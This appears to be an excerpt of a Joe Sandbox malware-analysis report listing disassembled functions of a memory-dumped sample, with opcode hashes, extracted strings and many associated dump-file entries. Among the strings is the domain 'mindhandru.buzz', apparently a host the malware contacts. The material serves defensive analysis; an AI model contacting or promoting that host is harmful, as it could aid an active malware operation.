Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: .txt$<\hX$_^]\
API String ID: 0-3117400391
Opcode ID: 81e0ccb4d007cd4889cf0716606345a1d76323855542e3b835c65116e4bf4458
Instruction ID: a7a16d6bc2a0599255e14de35a71fa5933a8f5b93efdd7237f6b3fb6ede5e350
Opcode Fuzzy Hash: 81e0ccb4d007cd4889cf0716606345a1d76323855542e3b835c65116e4bf4458
Instruction Fuzzy Hash: BBC1317260C340DFD705DF68D89162ABBE2AFC9311F088A6CF4D9472A2D3359989DB13

Function 0093D4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON

Download Yara Rule

Strings

V], xrefs: 0093D6E4
mindhandru.buzz, xrefs: 0093D819
Fm, xrefs: 0093D6DD

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: Fm$V]$mindhandru.buzz
API String ID: 0-77585785
Opcode ID: 8c9ac90abad9700086a7e9aa814ed70ec107bef47545f81bcefec038c553b73a
Instruction ID: 2364188e7d2b78eea071f0183367b21c194cb83dccb2a9da5e32d732bea111eb
Opcode Fuzzy Hash: 8c9ac90abad9700086a7e9aa814ed70ec107bef47545f81bcefec038c553b73a
Instruction Fuzzy Hash: 3091CEB62597408FD325CF29D490656BFA2EF96318729869CC0994F726C37AA807CF90

Function 0093D83C Relevance: 4.0, Strings: 3, Instructions: 278COMMON

Download Yara Rule

Strings

V], xrefs: 0093DA25
Fm, xrefs: 0093DA1E
mindhandru.buzz, xrefs: 0093DB46

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: Fm$V]$mindhandru.buzz
API String ID: 0-77585785
Opcode ID: ba368abffbfa511031cbe5affae201e92eba12e469ba7fd949122c9d4f105fdd
Instruction ID: ae9b49a6995fd6c4527786db53b2299de02584f39121abcdc45d385074ddad9e
Opcode Fuzzy Hash: ba368abffbfa511031cbe5affae201e92eba12e469ba7fd949122c9d4f105fdd
Instruction Fuzzy Hash: FF8101B61497408FD7268F29D4D0652BFA2FF9631071A859CC8D54F36AC339E806CF91

Function 00944CA0 Relevance: 3.5, Strings: 2, Instructions: 1046COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00945715
D]+\, xrefs: 00945380

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: D]+\$_^]\
API String ID: 0-2976362004
Opcode ID: b79af0cdb8968b85060280ae9116cbf7910b510baa9a276b63cf586b78305af6
Instruction ID: 2ad5ae312118fc4fd935748333f4a4d59fb8752f10154a94aadb33d8ccfd3b85
Opcode Fuzzy Hash: b79af0cdb8968b85060280ae9116cbf7910b510baa9a276b63cf586b78305af6
Instruction Fuzzy Hash: 9552527561C300DBD7149F28EC52B3BB3E1FB85314F19492CE58A872A2E771AC85DB92

Function 0094D003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON

Download Yara Rule

Strings

[V, xrefs: 0094D4DD
bh, xrefs: 0094D4D6

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: [V$bh
API String ID: 0-2174178241
Opcode ID: 65692a6cba2c7ca9b60d705f758a2632b21d9e276f2cf90d2837c144067189a7
Instruction ID: 31c057f2ede276433fc8ee70befb8f36daad777416cbe9f2a008eb88c10ed03a
Opcode Fuzzy Hash: 65692a6cba2c7ca9b60d705f758a2632b21d9e276f2cf90d2837c144067189a7
Instruction Fuzzy Hash: 1C3249B5A01715CBCB24CF28C891BBBB7B1FF95314F18825CD8969B394E734A941CB91

Function 00952830 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00952C05
C@, xrefs: 0095285E

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: C@$_^]\
API String ID: 0-1259475386
Opcode ID: 65ad3e889dca4fd9866082866d42697e0dffc342105feba4eaddb074483788f6
Instruction ID: 2f055f665920963f755c6842e8e6372ce72cede903395de337c205f225db12ef
Opcode Fuzzy Hash: 65ad3e889dca4fd9866082866d42697e0dffc342105feba4eaddb074483788f6
Instruction Fuzzy Hash: 66B1F9B1A083049BD724DB26C85277BB3F5EFD2325F19892CEC9697382E334D9098752

Function 0094961B Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

wt, xrefs: 009498CB
&, xrefs: 009497D7

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
